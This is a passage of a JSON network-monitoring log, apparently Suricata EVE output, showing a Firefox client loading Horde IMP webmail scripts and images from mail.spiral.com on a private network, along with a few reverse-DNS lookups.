Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.583273+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} 
{"timestamp":"2020-02-29T00:27:04.584564+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53172,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:27:04.586989+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:27:04.588199+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53174,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} 
{"timestamp":"2020-02-29T00:27:04.592501+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.592938+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:27:04.594190+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.594830+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:27:04.603692+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} 
{"timestamp":"2020-02-29T00:27:04.603842+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.604106+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:27:04.609489+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} 
{"timestamp":"2020-02-29T00:27:04.611348+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.611374+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.611713+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:27:04.612519+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:27:04.625672+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.669222+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:27:04.780014+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":5}} {"timestamp":"2020-02-29T00:27:04.780291+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:27:04.798054+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.803799+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:27:04.806387+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} 
{"timestamp":"2020-02-29T00:27:04.807839+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:27:04.809644+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:27:04.811188+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} 
{"timestamp":"2020-02-29T00:27:04.812217+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} {"timestamp":"2020-02-29T00:27:04.816779+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:27:04.817929+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":10}} {"timestamp":"2020-02-29T00:27:04.818165+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.819069+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} 
{"timestamp":"2020-02-29T00:27:04.819931+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":11}} {"timestamp":"2020-02-29T00:27:04.831587+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:27:04.843532+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51486,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54972,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.846223+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:27:04.847040+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.847645+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:27:04.874816+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":12}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.071870+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.074175+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 